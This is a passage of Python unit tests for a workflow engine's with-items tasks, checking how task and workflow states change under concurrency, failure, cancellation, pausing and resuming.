items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.FAILED, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING] * 3 + [states.FAILED]
expected_workflow_states = [states.RUNNING] * 3 + [states.FAILED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow failed.
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
def test_cancel_item(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.CANCELED, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING] + [states.CANCELING] * 2 + [states.CANCELED]
expected_workflow_states = [states.RUNNING] + [states.CANCELING] * 2 + [states.CANCELED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_cancel_with_items_incomplete(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.CANCELED, states.SUCCEEDED]
expected_task_states = [states.RUNNING, states.CANCELING, states.CANCELED]
expected_workflow_states = [states.RUNNING, states.CANCELING, states.CANCELED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow is canceled.
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_cancel_workflow_using_canceling_state_with_items_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
# Verify the set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs,
items_count=len(task_ctx['xs'])
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
# Cancel the workflow.
conductor.request_workflow_state(states.CANCELING)
self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELING)
# Complete the items.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is completed and workflow is canceled.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_cancel_workflow_using_canceled_state_with_items_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
# Verify the set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs,
items_count=len(task_ctx['xs'])
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
# Cancel the workflow.
conductor.request_workflow_state(states.CANCELED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELING)
# Complete the items.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is completed and workflow is canceled.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_cancel_workflow_using_canceling_state_with_items_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 2
expected_task_states = [states.RUNNING] * 2
expected_workflow_states = [states.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Cancel the workflow.
conductor.request_workflow_state(states.CANCELING)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELED)
def test_cancel_workflow_using_canceled_state_with_items_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 2
expected_task_states = [states.RUNNING] * 2
expected_workflow_states = [states.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Cancel the workflow.
conductor.request_workflow_state(states.CANCELED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELED)
def test_cancel_workflow_with_items_concurrency_and_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
# Verify the first set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs[0:concurrency],
items_count=len(task_ctx['xs']),
items_concurrency=concurrency
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0, concurrency):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
# Cancel the workflow.
conductor.request_workflow_state(states.CANCELING)
self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELING)
# Complete the items.
for i in range(0, concurrency):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow are canceled.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_pause_item(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.PAUSED, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow is paused.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_resume_paused_item(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.PAUSED, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
# Resume the paued action execution.
context = {'item_id': 1}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
self.assertEqual(conductor.flow.staged[task_name]['items'][1]['state'], states.RUNNING)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Complete the resumed action execution.
context = {'item_id': 1}
result = task_ctx['xs'][1]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result=result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the task and workflow succeeded.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_pausing_state_with_items_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
# Verify the set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs,
items_count=len(task_ctx['xs'])
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
# Pause the workflow.
conductor.request_workflow_state(states.PAUSING)
self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSING)
# Complete the items.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is completed and workflow is paused.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
# Resume the workflow.
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_paused_state_with_items_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
# Verify the set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs,
items_count=len(task_ctx['xs'])
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
# Pause the workflow.
conductor.request_workflow_state(states.PAUSED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSING)
# Complete the items.
for i in range(0, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is completed and workflow is paused.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
# Resume the workflow.
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_pausing_state_with_items_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 2
expected_task_states = [states.RUNNING] * 2
expected_workflow_states = [states.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Pause the workflow.
conductor.request_workflow_state(states.PAUSING)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)
# Resume the workflow.
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.RESUMING)
# Verify the second set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs[concurrency:],
items_count=len(task_ctx['xs']),
items_concurrency=concurrency
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0 + concurrency, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Complete the items.
for i in range(0 + concurrency, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow are completed.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_paused_state_with_items_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 2
expected_task_states = [states.RUNNING] * 2
expected_workflow_states = [states.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Pause the workflow.
conductor.request_workflow_state(states.PAUSED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)
# Resume the workflow.
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.RESUMING)
# Verify the second set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs[concurrency:],
items_count=len(task_ctx['xs']),
items_concurrency=concurrency
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0 + concurrency, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Complete the items.
for i in range(0 + concurrency, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow are completed.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_with_items_concurrency_and_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
# Verify the first set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs[0:concurrency],
items_count=len(task_ctx['xs']),
items_concurrency=concurrency
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0, concurrency):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
# Pause the workflow.
conductor.request_workflow_state(states.PAUSING)
self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSING)
# Complete the items.
for i in range(0, concurrency):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow are paused.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
# Resume the workflow.
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.RESUMING)
# Verify the second set of action executions.
expected_task = self.format_task_item(
task_name,
task_ctx,
conductor.spec.tasks.get_task(task_name),
action_specs=task_action_specs[concurrency:],
items_count=len(task_ctx['xs']),
items_concurrency=concurrency
)
expected_tasks = [expected_task]
